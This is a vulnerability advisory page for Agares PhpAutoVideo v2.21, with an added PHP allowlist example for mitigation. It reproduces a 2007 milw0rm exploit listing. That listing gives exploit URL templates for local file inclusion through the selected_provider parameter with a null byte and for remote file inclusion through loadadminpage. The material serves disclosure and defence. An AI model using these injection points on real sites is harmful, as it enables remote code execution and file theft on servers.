Vendor: Agares PhpAutoVideo
By: MhZ91
CVSS: N/A (HIGH)
CWE: Remote File Inclusion + Local File Inclusion
Product Name: Agares PhpAutoVideo
Affected Version From: Agares PhpAutoVideo v2.21
Affected Version To: Agares PhpAutoVideo v2.21
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Agares PhpAutoVideo v2.21 – Remote File Inclusion + Local File Inclusion

This vulnerability allows an attacker to include remote or local files in the vulnerable application. With Local File Inclusion, an attacker can include files from the target system, potentially leading to information disclosure or remote code execution. With Remote File Inclusion, an attacker can include arbitrary files from external servers, potentially leading to remote code execution.

Mitigation:

To mitigate the risk of Local File Inclusion, validate and sanitize user-supplied input before it is used in file inclusion functions. For Remote File Inclusion, do not use user-supplied input to include files without the same validation and sanitization.
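
One way to apply the mitigation above, as an added example that is not code from PhpAutoVideo or from the original advisory: the request value is used only as a key into a fixed allowlist, so it never becomes part of an include path. The function name, allowlist entries and directory layout are hypothetical; `selected_provider` and `loadadminpage` are the parameters named in the advisory.

```php
<?php
declare(strict_types=1);

/**
 * Map a request parameter to an include path through a fixed allowlist.
 * Returns the absolute path to include, or null when the value is rejected.
 * Hypothetical helper: allowlist entries and directory layout are assumptions.
 */
function resolve_include(string $value, array $allowlist, string $baseDir): ?string
{
    // The request value is only a lookup key. Values carrying "/", "..",
    // a URL scheme or a NUL byte have no entry and are rejected here.
    if (!array_key_exists($value, $allowlist)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowlist[$value]);
    // Defence in depth: the resolved file must exist and stay inside $baseDir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample layout (not the product's real files).
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pav_demo_' . getmypid();
mkdir($baseDir);
file_put_contents($baseDir . DIRECTORY_SEPARATOR . 'youtube.php', "<?php // provider block\n");
$providers = ['youtube' => 'youtube.php'];

// Constructed inputs: one valid key, then the shapes the advisory describes
// (path with trailing NUL byte, remote URL, relative path to another script).
$samples = [
    'youtube',
    "../../some/other/file\0",
    'http://example.invalid/remote.txt',
    '../admin/frontpage_right',
];
foreach ($samples as $s) {
    $p = resolve_include($s, $providers, $baseDir);
    printf("%-40s => %s\n", json_encode($s), $p === null ? 'REJECTED' : 'include ' . basename($p));
}

// Clean up the constructed layout.
unlink($baseDir . DIRECTORY_SEPARATOR . 'youtube.php');
rmdir($baseDir);
```

Independently of application code, keeping `allow_url_include` set to `Off` in php.ini stops `include` and `require` from fetching URLs.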

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          
---------------------------------------------------------------

Http://www.inj3ct-it.org        Staff[at]inj3ct-it[dot]org   

---------------------------------------------------------------

    Remote File Inclusion + Local File Inclusion

---------------------------------------------------------------

# Author: MhZ91
# Title: Agares PhpAutoVideo v2.21 - Remote File Inclusion + Local File Inclusion
# Download: http://scriptmafia.org/2007/12/19/agares_phpautovideo_v2.21.html
# Bug: Remote File Inclusion + Local File Inclusion
# Visit: http://www.inj3ct-it.org

---------------------------------------------------------------

Local File Inclusion:

http://[site]/includes/block.php?selected_provider=[LFI]%00

---------------------------------------------------------------

Remote File Inclusion

http://[site]/admin/frontpage_right.php?loadadminpage=[Evil_Code]

---------------------------------------------------------------

# milw0rm.com [2007-12-24]